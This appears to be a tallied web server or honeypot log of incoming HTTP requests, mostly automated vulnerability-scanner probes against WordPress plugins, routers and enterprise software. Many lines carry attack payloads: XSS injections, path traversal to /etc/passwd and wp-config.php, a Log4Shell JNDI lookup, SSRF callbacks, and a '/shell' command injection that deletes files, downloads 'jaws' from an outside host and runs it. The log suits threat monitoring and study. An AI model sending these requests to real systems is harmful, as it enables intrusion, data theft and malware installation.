1 | GET | /setup/index.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showfile.php?file=/etc/passwd |
HTTP/1.1 |
1 | GET | /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 |
HTTP/1.1 |
1 | GET | /site_admin/user/login |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.cfoshuv52mup8baf1ho0ceb3hfqrc988m.oast.fun/a%7D |
HTTP/1.1 |
1 | GET | /solr/admin/cores?wt=json |
HTTP/1.1 |
1 | GET | /spaces/viewdefaultdecorator.action?decoratorName |
HTTP/1.1 |
1 | GET | /spring-mvc-showcase/resources/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini |
HTTP/1.1 |
1 | GET | /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search&what=x&where=BODY |
HTTP/1.1 |
1 | GET | /src/search.php?mailbox=INBOX&submit=Search&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E |
HTTP/1.1 |
1 | GET | /static/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini |
HTTP/1.1 |
2 | GET | /status.php |
HTTP/1.1 |
2 | GET | /status |
HTTP/1.1 |
1 | GET | /storage/logs/laravel.log |
HTTP/1.1 |
1 | GET | /svnserve.conf |
HTTP/1.1 |
1 | GET | /sysinit.shtml?r=52300 |
HTTP/1.1 |
1 | GET | /system/console |
HTTP/1.1 |
1 | GET | /system/deviceInfo?auth=YWRtaW46MTEK |
HTTP/1.1 |
1 | GET | /system/login |
HTTP/1.1 |
1 | GET | /templates/login.php |
HTTP/1.1 |
1 | GET | /test.txt%250d%250aSet-Cookie:CRLFInjection=Test%250d%250aLocation:%2520interact.sh%250d%250aX-XSS-Protection:0 |
HTTP/1.1 |
1 | GET | /test/config/secrets.yml |
HTTP/1.1 |
1 | GET | /test/pathtraversal/master/..%25252f..%25252f..%25252f..%25252f../etc/passwd |
HTTP/1.1 |
1 | GET | /tests/Zend/Http/Client/_files/testRedirections.php?param=<img/src=x%20onerror=alert(document.domain)>&redirection=3 |
HTTP/1.1 |
1 | GET | /tiki-jsplugin.php?language=../../../../../../../../../../windows/win.ini&plugin=x |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd |
HTTP/1.1 |
1 | GET | /tool/view/phpinfo.view.php |
HTTP/1.1 |
1 | GET | /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php |
HTTP/1.1 |
1 | GET | /ui/ |
HTTP/1.1 |
1 | GET | /ui/index.html |
HTTP/1.1 |
1 | GET | /ui/login |
HTTP/1.1 |
1 | GET | /ui/vropspluginui/rest/services/getstatus |
HTTP/1.1 |
1 | GET | /umbraco/BackOffice/Api/Help/GetContextHelpForPage?baseUrl=http[:]//cfoshuv52mup8baf1ho0sbf3c8x8gxizo[.]oast[.]fun§ion=content&tree=undefined |
HTTP/1.1 |
1 | GET | /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?baseUrl=http[:]//cfoshuv52mup8baf1ho03nwp7arj9adc7[.]oast[.]fun/§ion=TryToAvoidGetCacheItem111 |
HTTP/1.1 |
1 | GET | /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?baseUrl=http[:]//cfoshuv52mup8baf1ho01fib6f341pfuo[.]oast[.]fun/§ion=AvoidGetCacheItem |
HTTP/1.1 |
1 | GET | /umbraco |
HTTP/1.1 |
1 | GET | /updating.jsp?url=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /upgrade.php |
HTTP/1.1 |
1 | GET | /user.php?mod=login |
HTTP/1.1 |
1 | GET | /user.php |
HTTP/1.1 |
1 | GET | /user/login?redirect=%2F |
HTTP/1.1 |
1 | GET | /user_secrets.yml.old |
HTTP/1.1 |
1 | GET | /user_secrets.yml |
HTTP/1.1 |
1 | GET | /users/new |
HTTP/1.1 |
2 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /v2/auth/roles |
HTTP/1.1 |
1 | GET | /var |
HTTP/1.1 |
1 | GET | /vendor/composer/installed.json |
HTTP/1.1 |
1 | GET | /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?param=<img/src=x%20onerror=alert(1)>&redirection=3 |
HTTP/1.1 |
1 | GET | /verify.php?confirm_hash&id=1 |
HTTP/1.1 |
1 | GET | /vpn/index.html |
HTTP/1.1 |
1 | GET | /vsaas/v2/login |
HTTP/1.1 |
1 | GET | /wan.htm |
HTTP/1.1 |
1 | GET | /wd/hub |
HTTP/1.1 |
1 | GET | /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /web-console/ServerInfo.jsp |
HTTP/1.1 |
1 | GET | /webadmin/ |
HTTP/1.1 |
1 | GET | /webadmin/reporter/view_server_log.php?act=stats&count=1000&filename&filter&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=1&offset&server=localhost&sortitem&sortorder |
HTTP/1.1 |
1 | GET | /webalizer/ |
HTTP/1.1 |
1 | GET | /weblogin.htm |
HTTP/1.1 |
1 | GET | /webpack.config.js |
HTTP/1.1 |
1 | GET | /websso/SAML2/SSO/vsphere.local?SAMLRequest |
HTTP/1.1 |
1 | GET | /wifi_base.shtml |
HTTP/1.1 |
1 | GET | /wlsecurity.html |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=directorist_author_pagination |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=easync_success_and_save |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=shareaholic_debug_info |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?callback=jQuery&fn=../../wp-config.php&jvfrm_spot_get_json |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 |
HTTP/1.1 |
1 | GET | /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http[:]//cfoshuv52mup8baf1ho0jk56ydjc5h5wi[.]oast[.]fun |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?page=download_report&report=users&status=all |
HTTP/1.1 |
1 | GET | /wp-admin/index.php |
HTTP/1.1 |
1 | GET | /wp-cli.yml |
HTTP/1.1 |
1 | GET | /wp-content/plugins/123contactform-for-wordpress/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/activehelper-livehelp/server/offline.php?BCC=BCC&COMPANY=COMPANY&COMPLETE=COMPLETE&DOMAINID=DOMAINID&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PHONE=PHONE&SECURITY=SECURITY&SERVER=SERVER&TITLE=TITLE&URL=URL |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/all-in-one-wp-migration/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/antispam-bee/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/astra-sites/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/autoptimize/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/backwpup/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/brandfolder/callback.php?wp_abspath=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/classic-widgets/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cloudflare/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cmb2/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/code-snippets/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/contact-form-7/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cookie-notice/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/creative-mail-by-constant-contact/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/disable-comments/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/duplicator/files/installer.cleanup.php?package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&remove=1 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/easy-google-fonts/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported |
HTTP/1.1 |
1 | GET | /wp-content/plugins/fluentform/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/formidable/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/google-listings-and-ads/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/google-site-kit/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/header-footer/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/idx-broker-platinum/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/insert-headers-and-footers/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/jh-404-logger/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/limit-login-attempts-reloaded/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/members/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/music-store/ms-core/ms-submit.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/nextgen-gallery/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract[.]sh |
HTTP/1.1 |
1 | GET | /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/popup-builder/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/really-simple-ssl/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/simple-page-ordering/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/siteorigin-panels/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/socialfit/popup.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&service=googleplus |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ssl-insecure-content-fixer/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/super-forms/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/under-construction-page/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/updraftplus/includes/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/updraftplus/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/use-any-font/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /wp-content/plugins/webp-express/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wordpress-popup/views/admin/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-fastest-cache/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-mail-smtp/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-optimize/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-pagenavi/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-statistics/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/yith-woocommerce-compare/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd |
HTTP/1.1 |
1 | GET | /wp-content/themes/Attitude/go.php?https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/themes/eatery/nav.php?-Menu-=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== |
HTTP/1.1 |
1 | GET | /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wp-file-manager-pro/fm_backup/ |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wpjobboard/ |
HTTP/1.1 |
1 | GET | /wp/wp-content/uploads/wpjobboard/ |
HTTP/1.1 |
1 | GET | /wt2parser.cgi?home_en |
HTTP/1.1 |
1 | GET | /xml/User/User.xml |
HTTP/1.1 |
1 | GET | /xmlrpc.php |
HTTP/1.1 |
1 | GET | /zabbix/index_sso.php |
HTTP/1.1 |
1 | GET | http[:]//checkip[.]amazonaws[.]com?Z78126052220Q1 |
HTTP/1.1 |
2 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /(download)/tmp/poc.txt |
HTTP/1.1 |
1 | POST | /.%250d./.%250d./.%250d./.%250d./bin/sh |
HTTP/1.1 |
1 | POST | /AdminTools/querybuilder/logon?framework |
HTTP/1.1 |
1 | POST | /EemAdminService/EemAdmin |
HTTP/1.1 |
1 | POST | /SamlResponseServlet |
HTTP/1.1 |
1 | POST | /Side.php |
HTTP/1.1 |
1 | POST | /TransferredOutModal.php?modfunc=detail |
HTTP/1.1 |
1 | POST | /WEB_VMS/LEVEL15/ |
HTTP/1.1 |
1 | POST | /_search |
HTTP/1.1 |
1 | POST | /account/index.php |
HTTP/1.1 |
2 | POST | /account |
HTTP/1.1 |
1 | POST | /actions/authenticate.php |
HTTP/1.1 |
1 | POST | /actuator/gateway/refresh |
HTTP/1.1 |
1 | POST | /actuator/gateway/routes/2Lw02doD4fJH2w5e63zdW0aGBx7 |
HTTP/1.1 |
3 | POST | /admin/ajax.php?action=login |
HTTP/1.1 |
1 | POST | /ajaxPages/writeBrowseFilePathAjax.php |
HTTP/1.1 |
1 | POST | /analytics/telemetry/ph/api/hyper/send?_c&_i=test |
HTTP/1.1 |
1 | POST | /api/graphql |
HTTP/1.1 |
3 | POST | /api/login |
HTTP/1.1 |
1 | POST | /api/user/login |
HTTP/1.1 |
1 | POST | /api/user/signup/step2 |
HTTP/1.1 |
1 | POST | /api/v1/method.callAnon/sendForgotPasswordEmail |
HTTP/1.1 |
1 | POST | /apisix/admin/user/login |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/login.cgi |
HTTP/1.1 |
1 | POST | /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users |
HTTP/1.1 |
1 | POST | /cgi-bin/rpc |
HTTP/1.1 |
1 | POST | /cgi/networkDiag.cgi |
HTTP/1.1 |
1 | POST | /cgi?2 |
HTTP/1.1 |
1 | POST | /cgi?7 |
HTTP/1.1 |
2 | POST | /cobbler_api |
HTTP/1.1 |
1 | POST | /conf_mail.php |
HTTP/1.1 |
1 | POST | /control/login |
HTTP/1.1 |
1 | POST | /debug/pyspidervulntest/run |
HTTP/1.1 |
1 | POST | /directdata/direct/router |
HTTP/1.1 |
1 | POST | /druid/indexer/v1/sampler?for=connect |
HTTP/1.1 |
1 | POST | /en/php/usb_sync.php |
HTTP/1.1 |
1 | POST | /examples/jsp/security/protected/j_security_check |
HTTP/1.1 |
1 | POST | /geoserver/j_spring_security_check |
HTTP/1.1 |
2 | POST | /getcfg.php |
HTTP/1.1 |
1 | POST | /goform/setmac |
HTTP/1.1 |
1 | POST | /graphql |
HTTP/1.1 |
1 | POST | /homeaction.php |
HTTP/1.1 |
1 | POST | /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd |
HTTP/1.1 |
1 | POST | /index.php?s=captcha |
HTTP/1.1 |
3 | POST | /index.php |
HTTP/1.1 |
1 | POST | /index/gettunnel |
HTTP/1.1 |
1 | POST | /integration/saveGangster.action |
HTTP/1.1 |
2 | POST | /jars/upload |
HTTP/1.1 |
1 | POST | /kindeditor/php/demo.php |
HTTP/1.1 |
2 | POST | /login.cgi |
HTTP/1.1 |
1 | POST | /login.php?action=login&type=admin |
HTTP/1.1 |
3 | POST | /login.php |
HTTP/1.1 |
3 | POST | /login |
HTTP/1.1 |
1 | POST | /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D |
HTTP/1.1 |
1 | POST | /lucee/2Lw01NRyoK8Eal9tPqGIfxQoBrz.cfm |
HTTP/1.1 |
1 | POST | /lucee/admin/imgProcess.cfm?file=/../../../context/2Lw01NRyoK8Eal9tPqGIfxQoBrz.cfm |
HTTP/1.1 |
1 | POST | /lucee/admin/imgProcess.cfm?file=/whatever |
HTTP/1.1 |
1 | POST | /magmi/web/magmi_run.php |
HTTP/1.1 |
1 | POST | /magmi/web/magmi_saveprofile.php |
HTTP/1.1 |
1 | POST | /mailingupgrade.php |
HTTP/1.1 |
1 | POST | /maint/index.php?packages |
HTTP/1.1 |
2 | POST | /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo |
HTTP/1.1 |
6 | POST | /oauth/token |
HTTP/1.1 |
1 | POST | /opennms/j_spring_security_check |
HTTP/1.1 |
1 | POST | /opensis/index.php |
HTTP/1.1 |
1 | POST | /orders/3 |
HTTP/1.1 |
1 | POST | /php/demo.php |
HTTP/1.1 |
1 | POST | /rest/issueNav/1/issueTable |
HTTP/1.1 |
1 | POST | /seeyon/thirdpartyController.do |
HTTP/1.1 |
1 | POST | /sess-bin/login_handler.cgi |
HTTP/1.1 |
1 | POST | /share/page/dologin |
HTTP/1.1 |
1 | POST | /struts2-rest-showcase/orders/3 |
HTTP/1.1 |
1 | POST | /sysShell |
HTTP/1.1 |
1 | POST | /system/sharedir.php |
HTTP/1.1 |
1 | POST | /templates/default/html/windows/right.php |
HTTP/1.1 |
1 | POST | /tmui/locallb/workspace/fileSave.jsp |
HTTP/1.1 |
3 | POST | /tmui/locallb/workspace/tmshCmd.jsp |
HTTP/1.1 |
2 | POST | /tools.cgi |
HTTP/1.1 |
1 | POST | /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData |
HTTP/1.1 |
1 | POST | /upload |
HTTP/1.1 |
1 | POST | /user/register?_wrapper_format=drupal_ajax&ajax_form=1&element_parents=account/mail/%23value |
HTTP/1.1 |
1 | POST | /v2/query |
HTTP/1.1 |
1 | POST | /webmail/basic/ |
HTTP/1.1 |
1 | POST | /website/blog/ |
HTTP/1.1 |
2 | POST | /wls-wsat/CoordinatorPortType |
HTTP/1.1 |
1 | POST | /wp-admin/admin-ajax.php?action=joomsport_md_load |
HTTP/1.1 |
5 | POST | /wp-admin/admin-ajax.php |
HTTP/1.1 |
1 | POST | /wp-login.php |
HTTP/1.1 |
1 | POST | /ws/v1/cluster/apps/new-application |
HTTP/1.1 |
1 | POST | /xmlpserver/services/XMLPService |
HTTP/1.1 |
1 | POST | /xmlrpc.php |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |
1 | PUT | /v1/agent/service/register |
HTTP/1.1 |
1 | PUT | /wp-content/plugins/w3-total-cache/pub/sns.php |
HTTP/1.1 |
1 | TRACE | / |
HTTP/1.1 |